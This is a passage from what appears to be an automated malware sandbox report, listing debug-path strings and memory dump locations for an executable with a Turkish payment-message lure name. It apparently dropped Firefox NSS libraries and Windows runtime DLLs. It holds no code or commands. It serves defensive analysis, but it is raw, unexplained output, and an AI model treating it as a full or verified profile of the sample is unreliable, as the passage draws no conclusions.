Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973403016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7974385257.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964033774.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987166435.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988457162.000000001DD24000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: msvcp140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7975695387.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
Source:	Binary string: ucrtbase.pdbUGP source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7967762388.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7977493803.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7978161221.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7962442056.0000000000178000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016652920.000000001E680000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970034391.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971102874.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971021047.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7985166767.000000001DD1C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 